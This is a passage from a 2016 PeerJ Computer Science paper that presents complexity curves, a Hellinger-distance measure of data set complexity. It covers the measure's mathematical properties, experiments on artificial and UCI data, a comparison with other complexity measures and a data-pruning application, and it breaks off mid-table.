https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Algorithm 2 Procedure for calculating conditional complexity curve. D – original data set, C – number of classes, N – number of subsets, K – number of sam- ples. 1. Transform D with whitening transform and/or ICA to obtain DI . 2. Split DI according to the class into D1I,D 2 I,...,D C I . 3. From D1I,D 2 I,...,D C I estimate probability distributions P 1,P2,...,PC. 4. For i in 1...|DI|with a step size |DI | N : (a) For j in 1...K : i. Draw subset Sji ⊆DI such that |S j i|= i. ii. Split Sji according to the class into S j,1 i ,S j,2 i ,...,S j,C i . iii. From Sj,1i ,S j,2 i ,...,S j,C i estimate probability distributions Q j,1 i ,Q j,2 i ,...,Q j,C i . iv. Calculate mean Hellinger distance: lji = 1 C ∑C k=1H 2(Pk,Qj,ki ). (b) Calculate mean mi and standard error si: mi= 1 K K∑ j=1 lji si= √√√√ 1 K K∑ j=1 ( mi−l j i )2 Conditional complexity curve is a plot of mi±si vs i. Comparison of standard complexity curve and conditional complexity curve for the iris data set is given by Fig. 1. This data set has three distinct classes. Our expectation is that estimating conditional distributions for each class would require larger data samples than estimating the overall distribution. Shape of the conditional complexity curve is consistent with this expectation: it is less steep than the standard curve and has larger AUCC value. PROPERTIES To support validity of the proposed method, we perform an in-depth analysis of its properties. We start from purely mathematical analysis, giving some intuitions on the complexity curve convergence rate and identifying border cases. Then, we perform experiments with toy artificial data sets testing basic assumptions behind complexity curve. After that, we compare it experimentally with other complexity data measures and show its usefulness in explaining classifier performance. Mathematical properties Drawing a random subset Sn from a finite data set D of size N corresponds to sampling without replacement. Let assume that the data set contains k distinct values {v1,v2,...,vk} occurring with frequencies P =(p1,p2,...,pk). Qn=(q1,q2,...,qk) will be a random vector which follows a multivariate hypergeometric distribution. qi= 1 n ∑ y∈Sn 1{y =vi}. The expected value for any single element is: E[qi]=pi. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 11/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 The probability of obtaining any specific vector of frequencies: P ( Qn=(q1,q2,...,qk) ) = ( p1N q1n )( p2N q2n ) ··· ( pkN qkn ) ( N n ) with ∑k i=1qi=1. We will consider the simplest case of discrete probability distribution estimated through frequency counts without using the independence assumption. In such case complexity curve is by definition: CC(n)=E[H2(P,Qn)]. It is obvious that CC(N)=0 because when n=N we draw all available data. This means that complexity curve always converges. We can ask whether it is possible to say anything about the rate of this convergence. This is the question about the upper bound on the tail of hypergeometric distribution. Such bound is given by Hoeffding-Chvátal inequality (Chvátal, 1979; Skala, 2013). For the univariate case it has the following form: P (∣∣qi−pi∣∣≥δ)≤2e−2δ2n which generalises to a multivariate case as: P(|Qn−P|≥δ)≤2ke −2δ2n where |Qn−P| is the total variation distance. Since H2(P,Qn)≤|Qn−P| this guarantees that complexity curve converges at least as fast. Now we will consider a special case when n=1. In this situation the multivariate hypergeometric distribution is reduced to a simple categorical distribution P. In such case the expected Hellinger distance is: E[H2(P,Q1)]= k∑ i=1 pi √ 2 √√√√ k∑ j=1 (√ pj−1{j=k} )2 = k∑ i=1 pi √ 2 √ 1−pi+ (√ pi−1 )2 = k∑ i=1 pi √ 1− √ pi. This corresponds to the first point of complexity curve and determines its overall steepness. Theorem: E[H2(P,Q1)] is maximal for a given k when P is an uniform categorical distribution over k categories, i.e.,: E[H2(P,Q1)]= k∑ i=1 pi √ 1− √ pi≤ √ 1− √ 1 k . Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 12/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Proof: We will consider an arbitrary distribution P and the expected Hellinger distance E[H2(P,Q1)]. We can modify this distribution by choosing two states l and k occurring with probabilities pl and pk such as that pl −pk is maximal among all pairs of states. We will redistribute the probability mass between the two states creating a new distribution P′. The expected Hellinger distance for the distribution P′ will be: E[H2(P′,Q1)]= k∑ i=1,i6=k,i6=l pi √ 1− √ pi+a √ 1− √ a+(pk+pl−a) √ 1− √ pk+pl−a where a and pk +pl −a are new probabilities of the two states in P′. We will consider a function f (a)=a √ 1− √ a+(pk+pl−a) √ 1− √ pk+pl and look for its maxima. ∂f (x) ∂a =− √ 1− √ pk+pl−a+ √ pk+pl−a 4 √ 1− √ pk+pl−a + √ 1− √ a− √ a 4 √ 1− √ a . The derivative is equal to 0 if and only if a= pk+pl2 . We can easily see that: f (0)= f (pk+pl)=(pk+pl) √ 1− √ pk+pl <(pk+pl) √ 1− √ pk+pl 2 . This means that f (a) reaches its maximum for a= pk+pl2 . From that, we can conclude that for any distribution P if we produce distribution P′ by redistributing probability mass between two states equally the following holds: E[H2(P′,Q1)]≥E[H 2(P,Q1)]. If we repeat such redistribution arbitrary number of times the outcome distribution converges to uniform distribution. This proves that the uniform distribution leads to the maximal expected Hellinger distance for a given number of states. Theorem: Increasing the number of categories by dividing an existing category into two new categories always increases the expected Hellinger distance, i.e., k∑ i=1 pi √ 1− √ pi≤ k∑ i=1,i6=l pi √ 1− √ pi+a √ 1− √ a+(pl−a) √ 1− √ pl−a. Proof: Without the loss of generality, we can assume that a<0.5pl. We can subtract terms occurring on both sides of the inequality obtaining: pl √ 1− √ pl ≤a √ 1− √ a+(pl−a) √ 1− √ pl−a pl √ 1− √ pl ≤a √ 1− √ a+pl √ 1− √ pl−a−a √ 1− √ pl−a pl √ 1− √ pl+a √ 1− √ pl−a≤a √ 1− √ a+pl √ 1− √ pl−a. Now we can see that: pl √ 1− √ pl ≤pl √ 1− √ pl−a Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 13/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 and a √ 1− √ pl−a≤a √ 1− √ a which concludes the proof. From the properties stated by these two theorems, we can gain some intuitions about complexity curves in general. First, by looking at the formula for the uniform distribution E[H2(P,Q1)]= √ 1− √ 1 k we can see that when k =1 E[H 2(P,Q1)]=0 and when k →∞ E[H2(P,Q1)]→1. The complexity curve will be less steep if the variables in the data set take multiple values and each value occurs with equal probability. This is consistent with our intuition: we need a larger sample to cover such space and collect information. For a smaller number of distinct values or distributions with mass concentrated mostly in a few points, a smaller sample will be sufficient to represent most of the information in the data set. Complexity curve and the performance of an unbiased model To confirm validity of the assumptions behind the complexity curve, we performed experiments with artificial data generated according to known models. For each of the data set, we selected an appropriate classifier which is known to be unbiased with respect to the given model. In this way it was possible to observe if the variance error component is indeed upper bounded by the complexity curve. To train the classifiers, we used the same setting as when calculating the complexity curve: classifiers were trained on random subsets and tested on the whole data set. We fitted the learning curve to the complexity curve by matching first and last points of both curves. We then observed the relation of the two curves in between. The first generated data set followed the logistic model (logit data set). Matrix X (1,000 observations, 12 attributes) contained values drawn from the normal distribution with mean 0 and standard deviation 1. Class vector Y was defined as follows: P(Y |x)= eβ ′x( 1+eβ′x ) where β= (0.2,0.3,0.4,0.5,0.6,0.7,0,0,0,0,0,0). All attributes were independent and conditionally independent. Since Y values were determined in a non-deterministic way, there was some noise present –classification error of the logistic regression classifier trained and tested on the full data set was larger than zero. Figure 2 presents the complexity curve and the adjusted error of logistic regression for the generated data. After ignoring the noise error component, we can see that the variance error component is indeed upper bounded by the complexity curve. Different kind of artificial data represented multidimensional space with parallel stripes in one dimension (stripes data set). It consisted of X matrix with 1,000 observations and 10 attributes drawn from an uniform distribution defined on the range [0,1). Class values Y depended only on the values of one of the attributes: for values lesser than 0.25 or greater than 0.75 the class was 1, for other values the class was 0. This kind of relation can Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 14/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Figure 2 Complexity curve and learning curve of the logistic regression on the logit data. Figure 3 Complexity curve and learning curve of the decision tree on the stripes data. be naturally modelled with a decision tree. All the attributes are again independent and conditionally independent. Figure 3 presents complexity curve and the adjusted error of decision tree classifier on the generated data. Once again the assumptions of complexity curve methodology are satisfied and the complexity curve indeed an upper bounds the classification error. What would happen if the attribute conditional independence assumption was broken? To answer this question, we generated another type of data modelled after multidimensional Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 15/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Figure 4 Complexity curve and learning curve of the decision tree on the chessboard data. chessboard (chessboard data set). X matrix contained 1,000 observations and 2, 3 attributes drawn from an uniform distribution on range[0,1). Class vector Y had the following values:{ 0 if 6mi=0 ⌊xi s ⌋ is even 1 otherwise where s was a grid step in our experiments set to 0.5. There is clearly strong attribute dependence, but since all parts of decision boundary are parallel to one of the attributes this kind of data can be modelled with a decision tree with no bias. Figure 4 presents complexity curves and error curves for different dimensionalities of chessboard data. Here the classification error becomes larger than indicated by complexity curve. The more dimensions, the more dependencies between attributes violating com- plexity curve assumptions. For a three-dimensional chessboard the classification problem becomes rather hard and the observed error decreases slowly, but the complexity curve remains almost the same as for a two-dimensional case. This shows that the complexity curve is not expected to be a good predictor of classification accuracy in the problems where a lot of high-dimensional attribute dependencies occur for example, in epistatic domains in which the importance of one attribute depends on the values of the other. The results of experiments with controlled artificial data sets are consistent with our theoretical expectations. Based on these results, we can introduce a general interpretation of the difference between complexity curve and learning curve: learning curve below the complexity curve is an indication that the algorithm is able to build a good model without sampling the whole domain, limiting the variance error component. On the other hand, the learning curve above the complexity curve is an indication that the algorithm includes complex attributes dependencies in the constructed model, promoting the variance error component. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 16/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Figure 5 Complexity curves for whitened data (dashed lines) and not whitened data (solid lines). Ar- eas under the curves are given in the legend. 8I—set of 8 independent random variables with Student’s t distribution. 8R—one random variable with Student’s t distribution repeated 8 times. 8I_w—whitened 8I. 8R_w—whitened 8R. Impact of whitening and ICA To evaluate the impact of the proposed preprocessing techniques (whitening and ICA— Independent Component Analysis) on complexity curves, we performed experiments with artificial data. In the first experiment, we generated two data sets of 300 observations and with eight attributes distributed according to Student’s t distribution with 1.5 degrees of freedom. In one data set all attributes were independent, in the other the same attribute was repeated eight times. Small Gaussian noise was added to both sets. Figure 5 shows complexity curves calculated before and after whitening transform. We can see that whitening had no significant effect on the complexity curve of the independent set. In the case of the dependent set, complexity curve calculated after whitening decreases visibly faster and the area under the curve is smaller. This is consistent with our intuitive notion of complexity: a data set with highly correlated or duplicated attributes should be significantly less complex. In the second experiment, two data sets with 100 observations and four attributes were generated. The first data set was generated from the continuous uniform distribution on interval [0,2], the second one from the discrete (categorical) uniform distribution on the same interval. Small Gaussian noise was added to both sets. Figure 6 presents complexity curves for original, whitened and ICA-transformed data. Among the original data sets, the intuitive notion of complexity is preserved: the area under the complexity curve for categorical data is smaller. The difference disappears for the whitened data but is again visible in the ICA-transformed data. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 17/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Figure 6 Complexity curves for whitened data (dashed lines), not whitened data (solid lines) and ICA- transformed data (dotted lines). Areas under the curves are given in the legend. U—data sampled from uniform distribution. C—data sampled from categorical distribution. U_w—whitened U. C_w—whitened C. U_ICA—U_w after ICA. C_ICA—C_w after ICA. These simple experiments are by no means exhaustive but they confirm usefulness of the chosen signal processing techniques (data whitening and the Independent Component Analysis) in the complexity curve analysis. Complexity curve variability and outliers The complexity curve is based on the expected Hellinger distance and the estimation procedure includes some variance. The natural assumption is that the variability caused by the sample size is greater than the variability resulting from a specific composition of a sample. Otherwise, averaging over samples of the same size would not be meaningful. This assumption is already present in standard learning curve methodology where classifier accuracy is plotted against training set size. We expect that the exact variability of the complexity curve will be connected with the presence of outliers in the data set. Such influential observations will have a huge impact depending on whether they will be included in a sample or not. To verify whether these intuitions were true, we constructed two new data sets by introducing artificially outliers to wine data set. In wine001 we modified 1% of the attribute values by multiplying them by a random number from range (−10,10). In wine005 5% of the values were modified in such manner. Figure 7 presents conditional complexity curves for all three data sets. wine001 curve has indeed a higher variance and is less regular than wine curve. wine005 curve is characterised not only by a higher variance but also by a larger AUCC value. This means that adding so much noise increased the overall complexity of the data set significantly. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 18/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Figure 7 Complexity curves for wine and its counterparts with introduced outliers. For the sake of clarity only contours were drawn. The result support our hypothesis that large variability of complexity curve signify an occurrence of highly influential observations in the data set. This makes complexity curve a valuable diagnostic tool for such situations. However, it should be noted that our method is unable to distinguish between important outliers and plain noise. To obtain this kind of insight, one has to employ different methods. Comparison with other complexity measures The set of data complexity measures developed by Ho & Basu (2002) and extended by Ho, Basu & Law (2006) continues to be used in experimental studies to explain performance of various classifiers (Diez-Pastor et al., 2015; Mantovani et al., 2015). We decided to compare experimentally complexity curve with those measures. Descriptions of the measures used are given in Table 1. According to our hypothesis conditional complexity curve should be robust in the context of class imbalance. To demonstrate this property, we used for the comparison 81 imbalanced data sets used previously in the study by Diez-Pastor et al. (2015). These data sets come originally from HDDT (Cieslak et al., 2011) and KEEL (Alcalá et al., 2011) repositories. We selected only binary classification problems. The list of data sets with their properties is presented in Supplemental Information 1 as Table S1 and Table S2. For each data set, we calculated the area under the complexity curve using the previously described procedure and the values of other data complexity measures using DCOL software (Orriols-Puig, Macià & Ho, 2010). Pearson’s correlation was then calculated for all the measures. As the T2 measure seemed to have non-linear characteristics destroying the correlation additional column logT2 was added to comparison. Results are presented in Fig. 8. Clearly, AUCC is mostly correlated with logT2 measure. This is to be expected as both measures are concerned with sample size in relation to attribute structure. The Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 19/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76/supp-1 http://dx.doi.org/10.7717/peerj-cs.76 Table 1 Data complexity measures used in experiments. Id Description F1 Maximum Fisher’s discriminant ratio F1v Directional-vector maximum Fisher’s discriminant ratio F2 Overlap of the per-class bounding boxes F3 Maximum individual feature efficiency F4 Collective feature efficiency L1 Minimized sum of the error distance of a linear classifier L2 Training error of a linear classifier L3 Nonlinearity of a linear classifier N1 Fraction of points on the class boundary N2 Ratio of average intra/inter class nearest neighbour distance N3 Leave-one-out error rate of the one-nearest neighbour classifier N4 Nonlinearity of the one-nearest neighbour classifier T1 Fraction of maximum covering spheres T2 Average number of points per dimension Figure 8 Pearson’s correlations between complexity measures. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 20/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Table 2 Pearson’s correlations coefficients between classifier AUC ROC performances and complexity measures. The largest absolute value in each row is printed in bold. AUCC logT2 LDA 0.0489 0.0227 Logistic regression −0.0539 0.1103 Naive Bayes −0.0792 0.0889 1-NN −0.1256 0.0772 3-NN −0.1311 0.0863 5-NN −0.1275 0.0952 10-NN −0.1470 0.1225 15-NN −0.1730 0.1584 20-NN −0.1842 0.1816 25-NN −0.1859 0.1902 30-NN −0.1969 0.2059 35-NN −0.2249 0.2395 Decision tree d =1 0.0011 −0.0624 Decision tree d =3 −0.1472 0.1253 Decision tree d =5 −0.1670 0.1690 Decision tree d =10 −0.1035 0.0695 Decision tree d =15 −0.0995 0.0375 Decision tree d =20 −0.0921 0.0394 Decision tree d =25 −0.0757 0.0298 Decision tree d =30 −0.0677 0.0227 Decision tree d = inf −0.0774 0.0345 difference is that T2 takes into account only the number of attributes while AUCC considers also the shape of distributions of the individual attributes. Correlations of AUCC with other measures are much lower and it can be assumed that they capture different aspects of data complexity and may be potentially complementary. The next step was to show that information captured by AUCC is useful for explaining classifier performance. In order to do so, we trained a number of different classifiers on the 81 benchmark data sets and evaluated their performance using random train-test split with proportion 0.5 repeated 10 times. The performance measure used was the area under the ROC curve. We selected three linear classifiers—naïve Bayes with Gaussian kernel, linear discriminant analysis (LDA) and logistic regression—and two families of non-linear classifiers of varying complexity: k-nearest neighbour classifier (k-NN) with different values of parameter k and decision tree (CART) with the limit on maximal tree depth. The intuition was as follows: the linear classifiers do not model attributes interdependencies, which is in line with complexity curve assumptions. Selected non-linear classifiers on the other hand are—depending on the parametrisation—more prone to variance error, which should be captured by the complexity curve. Correlations between AUCC, logT2, and classifier performance are presented in Table 2. Most of the correlations are weak and do not reach statistical significance; however, some general tendencies can be observed. As can be seen, AUC ROC scores of linear Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 21/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 classifiers have very little correlation with AUCC and logT2. This may be explained by the high-bias and low-variance nature of these classifiers: they are not strongly affected by data scarcity but their performance depends on other factors. This is especially true for the LDA classifier, which has the weakest correlation among linear classifiers. In k-NN, classifier complexity depends on k parameter: with low k values, it is more prone to variance error, with a larger k it is prone to bias if the sample size is not large enough (Domingos, 2000). Both AUCC and logT2 seem to capture the effect of sample size in the case of large k values well (correlations −0.2249 and 0.2395 for 35-NN). However, for k=1 the correlation with AUCC is stronger (−0.1256 vs 0.0772). Depth parameter in decision tree also regulates complexity: the larger the depth the more classifier is prone to variance error and less to bias error. This suggests that AUCC should be more strongly correlated with performance of deeper trees. On the other hand, complex decision trees explicitly model attribute interdependencies ignored by complexity curve, which may weaken the correlation. This is observed in the obtained results: for a decision stub (tree of depth 1), which is low-variance high-bias classifier, correlation with AUCC and logT2 is very weak. For d =3 and d =5 it becomes visibly stronger, and then for larger tree depth it again decreases. It should be noted that with large tree depth, as with small k values in k-NN, AUCC has stronger correlation with the classifier performance than logT2. A slightly more sophisticated way of applying data complexity measures is an attempt to explain classifier performance relative to some other classification method. In our experiments, LDA is a good candidate for reference method since it is simple, has low variance and is not correlated with either AUCC or logT2. Table 3 presents correlations of both measures with classifier performance relative to LDA. Here we can see that correlations for AUCC are generally higher than for logT2 and reach significance for the majority of classifiers. Especially in the case of decision tree, AUCC explains relative performance better than logT2 (correlation 0.1809 vs −0.0303 for d = inf). Results of the presented correlation analyses demonstrate the potential of the complexity curve to complement the existing complexity measures in explaining classifier performance. As expected from theoretical considerations, there is a relation between how well AUCC correlates with classifier performance and the classifier’s position in the bias–variance spec- trum. It is worth noting that despite the attribute independence assumption the complexity curve method proved useful for explaining performance of complex non-linear classifiers. Large p, small n problems There is a special category of machine learning problems in which the number of attributes p is large with respect to the number of samples n, perhaps even order of magnitudes larger. Many important biological data sets, most notably data from microarray experiments, fall into this category (Johnstone & Titterington, 2009). To test how our complexity measure behaves in such situations, we calculated AUCC scores for a few microarray data sets and compared them with AUC ROC scores of some simple classifiers. Classifiers were evaluated as in the previous section. Detailed information about the data sets is given in Supplemental Information 1 as Table S3. Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 22/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76/supp-1 http://dx.doi.org/10.7717/peerj-cs.76/supp-1 http://dx.doi.org/10.7717/peerj-cs.76 Table 3 Pearson’s correlations coefficients between classifier AUC ROC performances relative to LDA performance and complexity measures. The largest absolute value in each row is printed in bold. AUCC logT2 LDA - Logistic regression 0.2026 −0.2025 LDA - Naive Bayes 0.2039 −0.1219 LDA - 1-NN 0.2278 −0.0893 LDA - 3-NN 0.2482 −0.1063 LDA - 5-NN 0.2490 −0.1210 LDA - 10-NN 0.2793 −0.1609 LDA - 15-NN 0.3188 −0.2148 LDA - 20-NN 0.3365 −0.2510 LDA - 25-NN 0.3392 −0.2646 LDA - 30-NN 0.3534 −0.2868 LDA - 35-NN 0.3798 −0.3259 LDA - Decision tree d =1 0.0516 0.1122 LDA - Decision tree d =3 0.3209 −0.1852 LDA - Decision tree d =5 0.3184 −0.2362 LDA - Decision tree d =10 0.2175 −0.0838 LDA - Decision tree d =15 0.2146 −0.0356 LDA - Decision tree d =20 0.2042 −0.0382 LDA - Decision tree d =25 0.1795 −0.0231 LDA - Decision tree d =30 0.1636 −0.0112 LDA - Decision tree d = inf 0.1809 −0.0303 Results of the experiment are presented in Table 4. As expected, with the number of attributes much larger than the number of observations, data is considered by our metric as extremely scarce –values of AUCC are in all cases above 0.95. On the other hand, the AUC ROC classification performance is very varied between data sets with scores approaching or equal to 1.0 for Leukemia and Lymphoma data sets, and scores around 0.5 baseline for Prostate. This is because, despite the large number of dimensions, the form of the optimal decision function can be very simple, utilising only a few of available dimensions. The complexity curve does not consider the shape of decision boundary at all, and thus does not reflect differences in classification performance. From this analysis we concluded that complexity curve is not a good predictor of classifier performance for data sets containing a large number of redundant attributes, as it does not differentiate between important and unimportant attributes. The logical way to proceed in such case would be to perform some form of feature selection or dimensionality reduction on the original data, and then calculate the complexity curve in the reduced dimensions. APPLICATIONS Interpreting complexity curves In order to prove the practical applicability of the proposed methodology, and show how complexity curve plot can be interpreted, we performed experiments with six simple Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 23/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76 Table 4 Areas under conditional complexity curve (AUCC) for microarray data sets along AUC ROC values for different classifiers. Dataset AUCC 1-NN 5-NN DT d-10 DT d-inf LDA NB LR Adenocarcinoma 0.9621 0.6354 0.5542 0.5484 0.5172 0.6995 0.5021 0.7206 Breast2 0.9822 0.5869 0.6572 0.6012 0.6032 0.6612 0.5785 0.6947 Breast3 0.9830 0.6788 0.7344 0.6274 0.6131 0.7684 0.6840 0.7490 Colon 0.9723 0.7395 0.7870 0.6814 0.6793 0.7968 0.5495 0.8336 Leukemia 0.9611 1.0000 0.9985 0.7808 0.8715 0.9615 0.8300 1.0000 Lymphoma 0.9781 0.9786 0.9976 0.8498 0.8660 0.9952 0.9700 1.0000 Prostate 0.9584 0.5931 0.4700 0.4969 0.5238 0.4908 0.5000 0.4615 Notes. k-NN, k-nearest neighbour; DT, CART decision tree; LDA, linear discriminant analysis; NB, naïve Bayes; LR, logistic regression. data sets from UCI Machine Learning Repository (Frank & Asuncion, 2010). The sets were chosen only as illustrative examples. The basic properties of the data sets are given in Supplemental Information as Table S4. For each data set, we calculated conditional complexity curve. The curves are presented in Fig. 9. Learning curves of CART decision tree (DT) were included for comparison. On most of the benchmark data sets we can see that complexity curve upper bounds the DT learning curve. The bound is relatively tight in the case of glass and iris, and looser for breast-cancer-wisconsin and wine data set. A natural conclusion is that a lot of variability contained in this last data set and captured by the Hellinger distance is irrelevant to the classification task. The most straightforward explanation would be the presence of unnecessary attributes not correlated with the class which can be ignored altogether. This is consistent with the results of various studies in feature selection. Choubey et al. (1996) identified that in glass data 7–8 attributes (78–89%) are relevant, in iris data 3 attributes (75%), and in breast-cancer-wisconsin 5–7 attributes (56–78%). Similar results were obtained for breast-cancer-wisconsin in other studies, which found that only 4 of the original attributes (44%) contribute to the classification (Ratanamahatana & Gunopulos, 2003; Liu, Motoda & Dash, 1998). Dy & Brodley (2004) obtained best classification results for wine data set with 7 attributes (54%). On monks-1 and car, the complexity curve is no longer a proper upper bound on the DT learning curve. This is an indication of models relying heavily on attribute interdependencies to determine the correct class. This is not surprising: both monks-1 and car are artificial data sets with discrete attributes devised for evaluation of rule-based and tree-based classifiers (Thrun et al., 1991; Bohanec & Rajkovič, 1988). Classes are defined with logical formulas utilising relations of multiple attributes rather than single values— clearly the attributes are interdependent. In that context, the complexity curve can be treated as a baseline for independent attribute situation and the generalisation curve as diagnostic tool indicating the presence of interdependencies. Besides the slope of the complexity curve we can also analyse its variability. We can see that the shape of wine complexity curve is very regular with small variance in each point, while the glass curve displays much higher variance. This mean that the observations in Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 24/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76/supplemental-information http://dx.doi.org/10.7717/peerj-cs.76 Figure 9 Conditional complexity curves for six different data sets from UCI Machine Learning repos- itory with areas under complexity curve (AUCC) reported: (A) car, AUCC: 0.08, (B) monks-1, AUCC: 0.05, (C) iris, AUCC: 0.19, (D) breast-cancer-wisconsin, AUCC: 0.13, (E) glass, AUCC: 0.44, (F) wine, AUCC: 0.35. glass data set are more diverse and some observations (or their combinations) are more important for representing data structure than the other. This short analysis demonstrate how to use complexity curves to compare properties of different data sets. Here only decision tree was used as reference classifier. The method can be easily extended to include multiple classifiers and compare their performance. We present such an extended analysis in Supplemental Information 2. Data pruning with complexity curves The problem of data pruning in the context of machine learning is defined as reducing the size of training sample in order to reduce classifier training time and still achieve Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 25/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76/supp-2 http://dx.doi.org/10.7717/peerj-cs.76 satisfactory performance. It becomes extremely important as the data grows and (a) does not fit the memory of a single machine, (b) training times of more complex algorithms become very long. A classic method for performing data pruning is progressive sampling—training the classifier on data samples of increasing size as long as its performance increases. Provost, Jensen & Oates (1999) analysed various schedules for progressive sampling and recommended geometric sampling, in which sample size is multiplied by a specified constant in each iteration, as the reasonable strategy in most cases. Geometric sampling uses samples of sizes ain0, where n0—initial sample size, a—multiplier, i—iteration number. In our method, instead of training classifier on the drawn data sample, we are probing the complexity curve. We are not trying to detect the convergence of classifier accuracy, but just search for a point on the curve corresponding to some reasonably small Hellinger distance value, e.g., 0.005. This point designates the smallest data subset which still contains the required amount of information. In this setting, we were not interested in calculating the whole complexity curve but just in finding the minimal data subset, which still contains most of the original information. The search procedure should be as fast as possible, since the goal of the data pruning is to save time spent on training classifiers. To comply with these requirements, we constructed a criterion function of the form f (x)=H2(Gx,D)−t, where D denotes a probability distribution induced by the whole data set, Gx a distribution induced by random subset of size x and t is the desired Hellinger distance. We used classic Brent method (Brent, 1973) to find a root of the criterion function. In this way, data complexity was calculated only for the points visited by Brent’s algorithm. To speed up the procedure even further, we used the standard complexity curve instead of the conditional one and settled for whitening transform as the only preprocessing technique. To verify if this idea is of practical use, we performed an experiment with three bigger data sets from UCI repository. Their basic properties are given in Supplemental Information 1 as Table S5. For all data sets, we performed a stratified 10 fold cross validation experiment. The training part of a split was pruned according to our criterion function with t =0.005 (CC pruning) or using geometric progressive sampling with multiplier a=2 and initial sample size n0 =100 (PS pruning). Achieving the same accuracy as with CC pruning was used as a stop criterion for progressive sampling. Classifiers were trained on pruned and unpruned data and evaluated on the testing part of each cross validation split. Standard error was calculated for the obtained values. We have used machine learning algorithms from the scikit-learn library (Pedregosa et al., 2011) and the rest of the procedure was implemented in Python with the help of NumPy and SciPy libraries. Calculations were done on a workstation with 8 core Intel R© Core TM i7-4770 3.4 Ghz CPU working under Arch GNU/Linux. Table 5 presents measured times and obtained accuracies. As can be seen, the difference in classification accuracies between pruned and unpruned training data is negligible. CC compression rate differs for the three data sets, which suggests that they are of different complexity: for led data only 5% is needed to perform successful classification, while Zubek and Plewczynski (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.76 26/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.76/supp-1 http://dx.doi.org/10.7717/peerj-cs.76/supp-1 http://dx.doi.org/10.7717/peerj-cs.76 Table 5 Obtained accuracies and training times of different classification algorithms on unpruned and pruned data sets. Score corresponds to classifier accuracy, time to classifier training time (including pruning procedure), rate to compression rate. CC corresponds to data pruning with complexity curves, PS to data pruning with progressive sampling. Classifier Score CC score Time CC time PS time PS rate Waveform Mean CC compression rate: 0.19±0.02 Mean CC compression time: 4.01±0.14 Linear SVC 0.86±0.00 0.86±0.00 27.71±0.35 6.69±0.52 10.73±8.65 0.55±0.49 Gaussian NB 0.80±0.01 0.80±0.01 0.02±0.00 4.02±0.14 0.03±0.01 0.01±0.00 RF 0.86±0.00 0.85±0.00 33.49±0.04 9.29±0.76 18.06±10.75 0.46±0.37 SVC 0.86±0.00 0.86±0.00 211.98±0.93 9.08±1.21 21.22±28.34 0.33±0.42 Tree 0.78±0.00 0.77±0.00 3.06±0.06 4.50±0.20 1.40±0.70 0.37±0.28 Logit 0.86±0.00 0.86±0.00 1.75±0.06 4.21±0.17 0.60±0.62 0.30±0.34 GBC 0.86±0.00 0.86±0.00 112.34±0.12 24.59±2.30 66.66±37.99 0.53±0.43 Led Mean CC compression rate: 0.04±0.01 Mean CC compression time: 1.38±0.03 Linear SVC 0.74±0.00 0.74±0.00 4.68±0.10 1.49±0.04 0.47±1.04 0.13±0.34 Gaussian NB 0.74±0.00 0.73±0.00 0.02±0.00 1.38±0.03 0.07±0.02 0.26±0.44 RF 0.74±0.00 0.73±0.00 1.77±0.01 1.47±0.03 0.83±0.25 0.05±0.04 SVC 0.74±0.00 0.74±0.00 82.16±0.86 1.56±0.07 10.04±17.52 0.26±0.44 Tree 0.74±0.00 0.73±0.00 0.03±0.00 1.38±0.03 0.04±0.01 0.09±0.10 Logit 0.74±0.00 0.74±0.00 2.03±0.08 1.42±0.03 0.30±0.44 0.17±0.33 GBC 0.74±0.00 0.73±0.00 51.26±0.40 3.57±0.30 6.32±4.05 0.04±0.04 Adult Mean CC compression rate: 0.33±0.02 Mean CC compression time: 0.93±0.05 Linear SVC 0.69±0.19 0.67±0.20 1.79±0.08 1.53±0.08 0.30±0.84 0.18±0.52 Gaussian NB 0.81±0.01 0.81±0.01 0.01±0.00 0.93±0.05 0.01±0.00 0.02±0.02 RF 0.86±0.01 0.85±0.01 2.04±0.01 1.60±0.09 2.11±1.18 0.69±0.59 SVC 0.76±0.00 0.76±0.00 81.70±0.56 10.52±2.31 5.06±7.17 0.16±0.19 Tree 0.81±0.00 0.81±0.01 0.12±0.00 0.97±0.05 0.10±0.08 0.72±0.72 Logit 0.80±0.00 0.80±0.00 0.08±0.01 0.96±0.05 0.05±0.07 0.42±0.68 GBC 0.86±0.00 0.86±0.00 2.33±0.01 1.80±0.09 2.37±1.22 0.67±0.57 Notes. Linear SVC, 